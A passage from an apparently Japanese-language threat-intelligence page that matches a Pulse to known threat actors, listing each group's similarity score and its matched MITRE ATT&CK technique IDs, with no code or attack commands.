  • T1189 - Drive-by Compromise
MITREへのリンク →

BRONZE BUTLER

Score: 17.81
Matched TTPs:
  • T1204.002 - Malicious File
  • T1574.001 - DLL
  • T1007 - System Service Discovery
  • T1036 - Masquerading
  • T1588.002 - Tool
  • T1203 - Exploitation for Client Execution
  • T1059.006 - Python
  • T1070.004 - File Deletion
  • T1189 - Drive-by Compromise
  • T1518 - Software Discovery
MITREへのリンク →

APT38

Score: 31.85
Matched TTPs:
  • T1204.002 - Malicious File
  • T1218.007 - Msiexec
  • T1055 - Process Injection
  • T1562.004 - Disable or Modify System Firewall
  • T1218.005 - Mshta
  • T1588.002 - Tool
  • T1218.001 - Compiled HTML File
  • T1486 - Data Encrypted for Impact
  • T1036.003 - Rename Legitimate Utilities
  • T1518.001 - Security Software Discovery
  • T1070.004 - File Deletion
  • T1189 - Drive-by Compromise
  • T1027.002 - Software Packing
  • T1529 - System Shutdown/Reboot
MITREへのリンク →

MuddyWater

Score: 40.80
Matched TTPs:
  • T1204.002 - Malicious File
  • T1574.001 - DLL
  • T1190 - Exploit Public-Facing Application
  • T1218.003 - CMSTP
  • T1555.003 - Credentials from Web Browsers
  • T1090.002 - External Proxy
  • T1016 - System Network Configuration Discovery
  • T1552.001 - Credentials In Files
  • T1218.005 - Mshta
  • T1583.006 - Web Services
  • T1041 - Exfiltration Over C2 Channel
  • T1210 - Exploitation of Remote Services
  • T1588.002 - Tool
  • T1203 - Exploitation for Client Execution
  • T1027.004 - Compile After Delivery
  • T1518.001 - Security Software Discovery
  • T1059.006 - Python
  • T1027.010 - Command Obfuscation
  • T1518 - Software Discovery
MITREへのリンク →

Naikon

Score: 7.99
Matched TTPs:
  • T1204.002 - Malicious File
  • T1574.001 - DLL
  • T1016 - System Network Configuration Discovery
  • T1036.004 - Masquerade Task or Service
  • T1518.001 - Security Software Discovery
MITREへのリンク →

Molerats

Score: 6.13
Matched TTPs:
  • T1204.002 - Malicious File
  • T1218.007 - Msiexec
  • T1555.003 - Credentials from Web Browsers
MITREへのリンク →

admin@338

Score: 6.27
Matched TTPs:
  • T1204.002 - Malicious File
  • T1007 - System Service Discovery
  • T1016 - System Network Configuration Discovery
  • T1203 - Exploitation for Client Execution
MITREへのリンク →

Gamaredon Group

Score: 34.41
Matched TTPs:
  • T1204.002 - Malicious File
  • T1497.001 - System Checks
  • T1608.001 - Upload Malware
  • T1055 - Process Injection
  • T1090 - Proxy
  • T1218.005 - Mshta
  • T1027.012 - LNK Icon Smuggling
  • T1583.006 - Web Services
  • T1041 - Exfiltration Over C2 Channel
  • T1534 - Internal Spearphishing
  • T1588.002 - Tool
  • T1027.004 - Compile After Delivery
  • T1518.001 - Security Software Discovery
  • T1027.010 - Command Obfuscation
  • T1070.004 - File Deletion
MITREへのリンク →

Darkhotel

Score: 14.99
Matched TTPs:
  • T1204.002 - Malicious File
  • T1497.001 - System Checks
  • T1016 - System Network Configuration Discovery
  • T1497.002 - User Activity Based Checks
  • T1203 - Exploitation for Client Execution
  • T1518.001 - Security Software Discovery
  • T1189 - Drive-by Compromise
MITREへのリンク →

APT32

Score: 34.47
Matched TTPs:
  • T1204.002 - Malicious File
  • T1598.003 - Spearphishing Link
  • T1574.001 - DLL
  • T1608.001 - Upload Malware
  • T1036 - Masquerading
  • T1055 - Process Injection
  • T1016 - System Network Configuration Discovery
  • T1059 - Command and Scripting Interpreter
  • T1036.004 - Masquerade Task or Service
  • T1218.005 - Mshta
  • T1583.006 - Web Services
  • T1041 - Exfiltration Over C2 Channel
  • T1588.002 - Tool
  • T1036.003 - Rename Legitimate Utilities
  • T1203 - Exploitation for Client Execution
  • T1027.010 - Command Obfuscation
  • T1070.004 - File Deletion
  • T1189 - Drive-by Compromise
MITREへのリンク →

The White Company

Score: 7.61
Matched TTPs:
  • T1204.002 - Malicious File
  • T1203 - Exploitation for Client Execution
  • T1518.001 - Security Software Discovery
  • T1070.004 - File Deletion
  • T1027.002 - Software Packing
MITREへのリンク →

IndigoZebra

Score: 3.65
Matched TTPs:
  • T1204.002 - Malicious File
  • T1583.006 - Web Services
  • T1588.002 - Tool
MITREへのリンク →

APT33

Score: 7.71
Matched TTPs:
  • T1204.002 - Malicious File
  • T1555.003 - Credentials from Web Browsers
  • T1552.001 - Credentials In Files
  • T1588.002 - Tool
  • T1203 - Exploitation for Client Execution
MITREへのリンク →

Silence

Score: 13.53
Matched TTPs:
  • T1204.002 - Malicious File
  • T1055 - Process Injection
  • T1090.002 - External Proxy
  • T1588.002 - Tool
  • T1218.001 - Compiled HTML File
  • T1027.010 - Command Obfuscation
  • T1070.004 - File Deletion
MITREへのリンク →

Sidewinder

Score: 20.42
Matched TTPs:
  • T1204.002 - Malicious File
  • T1598.003 - Spearphishing Link
  • T1574.001 - DLL
  • T1016 - System Network Configuration Discovery
  • T1218.005 - Mshta
  • T1598.002 - Spearphishing Attachment
  • T1203 - Exploitation for Client Execution
  • T1518.001 - Security Software Discovery
  • T1027.010 - Command Obfuscation
  • T1518 - Software Discovery
MITREへのリンク →

Confucius

Score: 8.61
Matched TTPs:
  • T1204.002 - Malicious File
  • T1218.005 - Mshta
  • T1583.006 - Web Services
  • T1041 - Exfiltration Over C2 Channel
  • T1203 - Exploitation for Client Execution
MITREへのリンク →

BlackTech

Score: 6.34
Matched TTPs:
  • T1204.002 - Malicious File
  • T1574.001 - DLL
  • T1190 - Exploit Public-Facing Application
  • T1588.002 - Tool
  • T1203 - Exploitation for Client Execution
MITREへのリンク →

Windshift

Score: 9.39
Matched TTPs:
  • T1204.002 - Malicious File
  • T1036 - Masquerading
  • T1518.001 - Security Software Discovery
  • T1189 - Drive-by Compromise
  • T1518 - Software Discovery
MITREへのリンク →

Scattered Spider

Score: 41.04
Matched TTPs:
  • T1484.002 - Trust Modification
  • T1598.003 - Spearphishing Link
  • T1598.004 - Spearphishing Voice
  • T1016 - System Network Configuration Discovery
  • T1090 - Proxy
  • T1588.001 - Malware
  • T1552.001 - Credentials In Files
  • T1021.007 - Cloud Services
  • T1041 - Exfiltration Over C2 Channel
  • T1588.002 - Tool
  • T1486 - Data Encrypted for Impact
  • T1556.009 - Conditional Access Policies
  • T1213.003 - Code Repositories
  • T1538 - Cloud Service Dashboard
MITREへのリンク →

Storm-0501

Score: 21.97
Matched TTPs:
  • T1484.002 - Trust Modification
  • T1190 - Exploit Public-Facing Application
  • T1036.004 - Masquerade Task or Service
  • T1021.007 - Cloud Services
  • T1486 - Data Encrypted for Impact
  • T1518.001 - Security Software Discovery
  • T1556.009 - Conditional Access Policies
  • T1027.002 - Software Packing
MITREへのリンク →

Evilnum

Score: 6.55
Matched TTPs:
  • T1497.001 - System Checks
  • T1574.001 - DLL
  • T1070.004 - File Deletion
MITREへのリンク →

Volt Typhoon

Score: 53.31
Matched TTPs:
  • T1497.001 - System Checks
  • T1007 - System Service Discovery
  • T1070.007 - Clear Network Connection History and Configurations
  • T1190 - Exploit Public-Facing Application
  • T1218 - System Binary Proxy Execution
  • T1555.003 - Credentials from Web Browsers
  • T1016 - System Network Configuration Discovery
  • T1090 - Proxy
  • T1584.005 - Botnet
  • T1591 - Gather Victim Org Information
  • T1593 - Search Open Websites/Domains
  • T1588.002 - Tool
  • T1587.004 - Exploits
  • T1591.004 - Identify Roles
  • T1070.004 - File Deletion
  • T1027.002 - Software Packing
  • T1518 - Software Discovery
  • T1596.005 - Scan Databases
  • T1090.001 - Internal Proxy
MITREへのリンク →

Silent Librarian

Score: 7.15
Matched TTPs:
  • T1598.003 - Spearphishing Link
  • T1608.005 - Link Target
  • T1588.002 - Tool
MITREへのリンク →

ZIRCONIUM

Score: 21.93
Matched TTPs:
  • T1598.003 - Spearphishing Link
  • T1218.007 - Msiexec
  • T1036 - Masquerading
  • T1555.003 - Credentials from Web Browsers
  • T1016 - System Network Configuration Discovery
  • T1036.004 - Masquerade Task or Service
  • T1583.006 - Web Services
  • T1041 - Exfiltration Over C2 Channel
  • T1059.006 - Python
  • T1027.002 - Software Packing
MITREへのリンク →

Cinnamon Tempest

Score: 8.74
Matched TTPs:
  • T1574.001 - DLL
  • T1190 - Exploit Public-Facing Application
  • T1090 - Proxy
  • T1588.002 - Tool
  • T1059.006 - Python
MITREへのリンク →

Velvet Ant

Score: 17.03
Matched TTPs:
  • T1574.001 - DLL
  • T1071 - Application Layer Protocol
  • T1055 - Process Injection
  • T1562.004 - Disable or Modify System Firewall
  • T1090.001 - Internal Proxy
  • T1211 - Exploitation for Defense Evasion
MITREへのリンク →

Aquatic Panda

Score: 21.24
Matched TTPs:
  • T1574.001 - DLL
  • T1007 - System Service Discovery
  • T1595.002 - Vulnerability Scanning
  • T1574.006 - Dynamic Linker Hijacking
  • T1588.001 - Malware
  • T1036.004 - Masquerade Task or Service
  • T1588.002 - Tool
  • T1518.001 - Security Software Discovery
  • T1027.010 - Command Obfuscation
  • T1070.004 - File Deletion
MITREへのリンク →

APT3

Score: 20.71
Matched TTPs:
  • T1574.001 - DLL
  • T1555.003 - Credentials from Web Browsers
  • T1090.002 - External Proxy
  • T1016 - System Network Configuration Discovery
  • T1546.008 - Accessibility Features
  • T1552.001 - Credentials In Files
  • T1041 - Exfiltration Over C2 Channel
  • T1203 - Exploitation for Client Execution
  • T1070.004 - File Deletion
  • T1027.002 - Software Packing
MITREへのリンク →

BackdoorDiplomacy

Score: 8.61
Matched TTPs:
  • T1574.001 - DLL
  • T1190 - Exploit Public-Facing Application
  • T1588.001 - Malware
  • T1036.004 - Masquerade Task or Service
  • T1588.002 - Tool
MITREへのリンク →

HAFNIUM

Score: 12.42
Matched TTPs:
  • T1583.005 - Botnet
  • T1190 - Exploit Public-Facing Application
  • T1016 - System Network Configuration Discovery
  • T1584.005 - Botnet
  • T1583.006 - Web Services
MITREへのリンク →

INC Ransom

Score: 9.48
Matched TTPs:
  • T1071 - Application Layer Protocol
  • T1190 - Exploit Public-Facing Application
  • T1588.002 - Tool
  • T1486 - Data Encrypted for Impact
  • T1070.004 - File Deletion
MITREへのリンク →

BlackByte

Score: 21.44
Matched TTPs:
  • T1562 - Impair Defenses
  • T1608.001 - Upload Malware
  • T1190 - Exploit Public-Facing Application
  • T1055 - Process Injection
  • T1562.004 - Disable or Modify System Firewall
  • T1016 - System Network Configuration Discovery
  • T1041 - Exfiltration Over C2 Channel
  • T1486 - Data Encrypted for Impact
  • T1518.001 - Security Software Discovery
  • T1070.004 - File Deletion
MITREへのリンク →

Mustard Tempest

Score: 3.74
Matched TTPs:
  • T1608.001 - Upload Malware
  • T1189 - Drive-by Compromise
MITREへのリンク →

APT42

Score: 8.24
Matched TTPs:
  • T1608.001 - Upload Malware
  • T1555.003 - Credentials from Web Browsers
  • T1016 - System Network Configuration Discovery
  • T1588.002 - Tool
  • T1518.001 - Security Software Discovery
MITREへのリンク →

GOLD SOUTHFIELD

Score: 6.26
Matched TTPs:
  • T1190 - Exploit Public-Facing Application
  • T1195.002 - Compromise Software Supply Chain
  • T1027.010 - Command Obfuscation
MITREへのリンク →

Fox Kitten

Score: 18.67
Matched TTPs:
  • T1190 - Exploit Public-Facing Application
  • T1546.008 - Accessibility Features
  • T1090 - Proxy
  • T1059 - Command and Scripting Interpreter
  • T1036.004 - Masquerade Task or Service
  • T1552.001 - Credentials In Files
  • T1210 - Exploitation of Remote Services
  • T1027.010 - Command Obfuscation
MITREへのリンク →

ToddyCat

Score: 5.71
Matched TTPs:
  • T1190 - Exploit Public-Facing Application
  • T1562.004 - Disable or Modify System Firewall
  • T1518.001 - Security Software Discovery
MITREへのリンク →

Blue Mockingbird

Score: 4.66
Matched TTPs:
  • T1190 - Exploit Public-Facing Application
  • T1090 - Proxy
  • T1588.002 - Tool
MITREへのリンク →

Volatile Cedar

Score: 8.19
Matched TTPs:
  • T1190 - Exploit Public-Facing Application
  • T1595.002 - Vulnerability Scanning
  • T1595.003 - Wordlist Scanning
MITREへのリンク →

Akira

Score: 6.88
Matched TTPs:
  • T1558 - Steal or Forge Kerberos Tickets
  • T1486 - Data Encrypted for Impact
MITREへのリンク →

Carbanak

Score: 5.29
Matched TTPs:
  • T1562.004 - Disable or Modify System Firewall
  • T1036.004 - Masquerade Task or Service
  • T1588.002 - Tool
MITREへのリンク →

Stealth Falcon

Score: 7.84
Matched TTPs:
  • T1555.003 - Credentials from Web Browsers
  • T1016 - System Network Configuration Discovery
  • T1059 - Command and Scripting Interpreter
  • T1041 - Exfiltration Over C2 Channel
MITREへのリンク →

Leafminer

Score: 9.05
Matched TTPs:
  • T1555.003 - Credentials from Web Browsers
  • T1552.001 - Credentials In Files
  • T1588.002 - Tool
  • T1027.010 - Command Obfuscation
  • T1189 - Drive-by Compromise
MITREへのリンク →

LAPSUS$

Score: 22.74
Matched TTPs:
  • T1555.003 - Credentials from Web Browsers
  • T1598.004 - Spearphishing Voice
  • T1090 - Proxy
  • T1588.001 - Malware
  • T1588.002 - Tool
  • T1589.001 - Credentials
  • T1591.004 - Identify Roles
  • T1213.003 - Code Repositories
MITREへのリンク →

FIN5

Score: 7.32
Matched TTPs:
  • T1090.002 - External Proxy
  • T1059 - Command and Scripting Interpreter
  • T1588.002 - Tool
  • T1070.004 - File Deletion
MITREへのリンク →

Lotus Blossom

Score: 5.25
Matched TTPs:
  • T1016 - System Network Configuration Discovery
  • T1588.002 - Tool
  • T1090.001 - Internal Proxy
MITREへのリンク →

Deep Panda

Score: 3.29
Matched TTPs:
  • T1546.008 - Accessibility Features
MITREへのリンク →

CopyKittens

Score: 3.19
Matched TTPs:
  • T1090 - Proxy
  • T1588.002 - Tool
MITREへのリンク →

MoustachedBouncer

Score: 4.39
Matched TTPs:
  • T1090 - Proxy
  • T1027.002 - Software Packing
MITREへのリンク →

Windigo

Score: 9.19
Matched TTPs:
  • T1090 - Proxy
  • T1059 - Command and Scripting Interpreter
  • T1189 - Drive-by Compromise
  • T1518 - Software Discovery
MITREへのリンク →

POLONIUM

Score: 5.20
Matched TTPs:
  • T1090 - Proxy
  • T1583.006 - Web Services
  • T1588.002 - Tool
MITREへのリンク →

Metador

Score: 4.69
Matched TTPs:
  • T1588.001 - Malware
  • T1588.002 - Tool
  • T1070.004 - File Deletion
MITREへのリンク →

Equation

Score: 8.26
Matched TTPs:
  • T1564.005 - Hidden File System
  • T1480.001 - Environmental Keying
MITREへのリンク →

Strider

Score: 7.06
Matched TTPs:
  • T1564.005 - Hidden File System
  • T1090.001 - Internal Proxy
MITREへのリンク →

このPulseに関連する脅威アクター (推論ベース)

APT41

Score: 0.70
Matched TTPs:
  • T1595.002 - Vulnerability Scanning
  • T1190 - Exploit Public-Facing Application
  • T1055 - Process Injection
  • T1203 - Exploitation for Client Execution
  • T1213.003 - Code Repositories
  • T1480.001 - Environmental Keying
  • T1218.001 - Compiled HTML File
  • T1595.003 - Wordlist Scanning
  • T1003.002 - Security Account Manager
  • T1016 - System Network Configuration Discovery
  • T1090 - Proxy
  • T1070.004 - File Deletion
  • T1195.002 - Compromise Software Supply Chain
  • T1486 - Data Encrypted for Impact
  • T1574.006 - Dynamic Linker Hijacking
  • T1014 - Rootkit
  • T1546.008 - Accessibility Features
  • T1588.002 - Tool
  • T1036.004 - Masquerade Task or Service
  • T1574.001 - DLL
  • T1027.002 - Software Packing
  • T1555.003 - Credentials from Web Browsers
  • T1596.005 - Scan Databases
MITREへのリンク →

Mustang Panda

Score: 0.70
Matched TTPs:
  • T1129 - Shared Modules
  • T1583.006 - Web Services
  • T1203 - Exploitation for Client Execution
  • T1608.001 - Upload Malware
  • T1016 - System Network Configuration Discovery
  • T1218.005 - Mshta
  • T1041 - Exfiltration Over C2 Channel
  • T1608 - Stage Capabilities
  • T1678 - Delay Execution
  • T1176.002 - IDE Extensions
  • T1070.004 - File Deletion
  • T1518 - Software Discovery
  • T1204.002 - Malicious File
  • T1059 - Command and Scripting Interpreter
  • T1027.012 - LNK Icon Smuggling
  • T1588.002 - Tool
  • T1574.001 - DLL
  • T1598.003 - Spearphishing Link
  • T1574.005 - Executable Installer File Permissions Weakness
  • T1027.007 - Dynamic API Resolution
  • T1593 - Search Open Websites/Domains
  • T1587.001 - Malware
MITREへのリンク →

Kimsuky

Score: 0.69
Matched TTPs:
  • T1027.010 - Command Obfuscation
  • T1190 - Exploit Public-Facing Application
  • T1055 - Process Injection
  • T1583.006 - Web Services
  • T1591 - Gather Victim Org Information
  • T1608.001 - Upload Malware
  • T1016 - System Network Configuration Discovery
  • T1218.005 - Mshta
  • T1041 - Exfiltration Over C2 Channel
  • T1070.004 - File Deletion
  • T1552.001 - Credentials In Files
  • T1204.002 - Malicious File
  • T1588.005 - Exploits
  • T1007 - System Service Discovery
  • T1027.012 - LNK Icon Smuggling
  • T1588.002 - Tool
  • T1036.004 - Masquerade Task or Service
  • T1059.006 - Python
  • T1518.001 - Security Software Discovery
  • T1562.004 - Disable or Modify System Firewall
  • T1598.003 - Spearphishing Link
  • T1027.002 - Software Packing
  • T1555.003 - Credentials from Web Browsers
  • T1534 - Internal Spearphishing
  • T1593 - Search Open Websites/Domains
  • T1587.001 - Malware
MITREへのリンク →

UNC3886

Score: 0.62
Matched TTPs:
  • T1036.004 - Masquerade Task or Service
  • T1059.006 - Python
  • T1190 - Exploit Public-Facing Application
  • T1554 - Compromise Host Software Binary
  • T1675 - ESXi Administration Command
  • T1562.004 - Disable or Modify System Firewall
  • T1203 - Exploitation for Client Execution
  • T1673 - Virtual Machine Discovery
  • T1588.001 - Malware
  • T1587.004 - Exploits
  • T1059.012 - Hypervisor CLI
  • T1505.006 - vSphere Installation Bundles
  • T1070.004 - File Deletion
  • T1681 - Search Threat Vendor Data
  • T1070.007 - Clear Network Connection History and Configurations
  • T1014 - Rootkit
  • T1587.001 - Malware
MITREへのリンク →

Volt Typhoon

Score: 0.62
Matched TTPs:
  • T1584.005 - Botnet
  • T1190 - Exploit Public-Facing Application
  • T1591 - Gather Victim Org Information
  • T1218 - System Binary Proxy Execution
  • T1016 - System Network Configuration Discovery
  • T1497.001 - System Checks
  • T1090.001 - Internal Proxy
  • T1587.004 - Exploits
  • T1090 - Proxy
  • T1070.004 - File Deletion
  • T1518 - Software Discovery
  • T1591.004 - Identify Roles
  • T1007 - System Service Discovery
  • T1070.007 - Clear Network Connection History and Configurations
  • T1588.002 - Tool
  • T1027.002 - Software Packing
  • T1555.003 - Credentials from Web Browsers
  • T1593 - Search Open Websites/Domains
  • T1596.005 - Scan Databases
MITREへのリンク →

Sandworm Team

Score: 0.58
Matched TTPs:
  • T1595.002 - Vulnerability Scanning
  • T1190 - Exploit Public-Facing Application
  • T1584.005 - Botnet
  • T1027.010 - Command Obfuscation
  • T1203 - Exploitation for Client Execution
  • T1608.001 - Upload Malware
  • T1195 - Supply Chain Compromise
  • T1041 - Exfiltration Over C2 Channel
  • T1090 - Proxy
  • T1070.004 - File Deletion
  • T1195.002 - Compromise Software Supply Chain
  • T1204.002 - Malicious File
  • T1486 - Data Encrypted for Impact
  • T1036 - Masquerading
  • T1588.002 - Tool
  • T1598.003 - Spearphishing Link
  • T1555.003 - Credentials from Web Browsers
  • T1499 - Endpoint Denial of Service
  • T1213.006 - Databases
  • T1593 - Search Open Websites/Domains
  • T1587.001 - Malware
MITREへのリンク →

Magic Hound

Score: 0.56
Matched TTPs:
  • T1595.002 - Vulnerability Scanning
  • T1190 - Exploit Public-Facing Application
  • T1027.010 - Command Obfuscation
  • T1583.006 - Web Services
  • T1573 - Encrypted Channel
  • T1016 - System Network Configuration Discovery
  • T1090 - Proxy
  • T1114.001 - Local Email Collection
  • T1070.004 - File Deletion
  • T1204.002 - Malicious File
  • T1486 - Data Encrypted for Impact
  • T1591.001 - Determine Physical Locations
  • T1189 - Drive-by Compromise
  • T1588.002 - Tool
  • T1036.004 - Masquerade Task or Service
  • T1562.004 - Disable or Modify System Firewall
  • T1598.003 - Spearphishing Link
  • T1071 - Application Layer Protocol
  • T1589.001 - Credentials
  • T1562 - Impair Defenses
MITREへのリンク →

FIN7

Score: 0.56
Matched TTPs:
  • T1027.010 - Command Obfuscation
  • T1190 - Exploit Public-Facing Application
  • T1583.006 - Web Services
  • T1591 - Gather Victim Org Information
  • T1608.001 - Upload Malware
  • T1218.005 - Mshta
  • T1674 - Input Injection
  • T1195.002 - Compromise Software Supply Chain
  • T1204.002 - Malicious File
  • T1486 - Data Encrypted for Impact
  • T1059 - Command and Scripting Interpreter
  • T1591.004 - Identify Roles
  • T1497.002 - User Activity Based Checks
  • T1210 - Exploitation of Remote Services
  • T1608.005 - Link Target
  • T1588.002 - Tool
  • T1036.004 - Masquerade Task or Service
  • T1562.004 - Disable or Modify System Firewall
  • T1587.001 - Malware
MITREへのリンク →

Related CVEs

このPulseに見つかったCVEはありません。

Pulse – 脅威アクター グラフ

← Pulse一覧に戻る